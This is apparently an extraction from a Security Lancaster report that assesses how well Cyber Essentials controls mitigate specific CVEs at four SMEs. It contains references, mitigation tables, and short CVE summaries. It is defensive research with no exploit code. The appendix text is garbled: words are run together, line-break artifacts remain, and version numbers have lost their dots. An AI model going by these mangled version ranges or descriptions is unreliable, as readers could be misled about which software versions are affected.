[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation & Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyber Controls Applicability

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)


CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (no JS)
CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration
CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration
CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall
CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management


CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control, Secure Configuration (Cookie-deletion)
CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated - Anti-Malware, Firewall, Patch Management
CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration
CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated - Firmware Management
CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Firmware Management
CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated - Boundary Firewalls include anti-DOS
CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management & SSL
CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection & Patch Management
CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated - Secure Configuration, Anti-Malware
CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated - Secure Configuration, Firmware Management
CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration (Secure Browser & Web Hosting)
CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated - Patch Management
CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware
CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster Page 16 of 28

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall, Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |   | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Anti-Dos, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28

CVE DetailsCVE-2013-0008

rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo

CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo

CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo

CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel

CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795

CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute

CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request

CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors

CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack

CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token

CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception

CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users

CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623

CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013

CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644

and CVE-2013-1374

CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection

CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content

CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call

CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors

CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site

CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743

CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093

